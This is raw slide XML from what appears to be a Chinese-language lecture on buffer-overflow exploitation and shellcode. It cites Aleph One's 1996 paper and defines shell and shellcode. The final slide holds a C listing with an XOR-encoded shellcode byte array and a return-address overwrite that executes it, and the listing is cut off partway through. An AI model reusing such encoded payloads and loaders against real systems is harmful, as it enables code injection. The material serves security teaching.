            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="线形标注 2 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6645399" y="880021"/>
            <a:ext cx="5688632" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>0X15</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740205025"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="1392150"/>
            <a:ext cx="10801200" cy="2080159"/>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1996</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Aleph One</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Underground</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发表了著名论文</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《SMASHING THE STACK FOR FUN AND PROFIT》</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，其中详细描述了</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Linux</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系统中栈的结构和如何利用基于栈的缓冲区溢出。在这篇具有划时代意义的论文中，</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Aleph One</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演示了如何向进程中植入一段用于获得</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的代码，并在论文中称这段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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被植入进程的代码为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3CFB2C-5281-4F62-9C80-76D4A8EE959C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="4120381"/>
            <a:ext cx="10801200" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="180000" rIns="180000" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pP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实际上，</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是一个命令解释器，它解释由用户输入的命令并且把它们送到内核。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0050A3"/>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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CAADFC-AF19-403A-8FDD-4CC67175A35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="3715088"/>
            <a:ext cx="2990900" cy="397220"/>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shell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2400" b="0"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6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4629175" y="698491"/>
            <a:ext cx="3625157" cy="523220"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="523220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5516230" y="837929"/>
              <a:ext cx="1826289" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="fr-FR" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>漏洞利用</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的手段</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR"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9" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3CFB2C-5281-4F62-9C80-76D4A8EE959C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248672" y="5525713"/>
            <a:ext cx="10801200" cy="1114948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="180000" rIns="180000" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pP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现在，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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已经表达的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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广义上的植入进程的代码</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，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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不是狭义上的仅仅用来获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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的代码</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kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0050A3"/>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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CAADFC-AF19-403A-8FDD-4CC67175A35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248672" y="5128493"/>
            <a:ext cx="2990900" cy="397220"/>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kern="0" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2400" b="0"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09736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0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2540943" y="303957"/>
            <a:ext cx="8661346" cy="504056"/>
            <a:chOff x="3837808" y="633225"/>
            <a:chExt cx="5862527" cy="678844"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3837808" y="633225"/>
              <a:ext cx="5862527" cy="621753"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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后面跟上任意的编码后的</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形成完整的可利用的</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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2836620413"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1532831" y="1096045"/>
          <a:ext cx="10009112" cy="5654214"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10009112">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5654214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>#include &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>stdio.h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>#include &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>windows.h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>char </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ourshellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>[]="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xFB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\x90\x75\xF1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xcf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\x80\x17\x14\x14\x17\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xfc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xae</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\x43\x91\x33\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xbb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>\x94\xd4";</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>void main()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>LoadLibrary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>("user32.dll");</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> *ret;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	ret=(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>*)&amp;ret+2;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	(*ret)=(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ourshellcode</a:t>
                      </a:r>
                      <a:r>
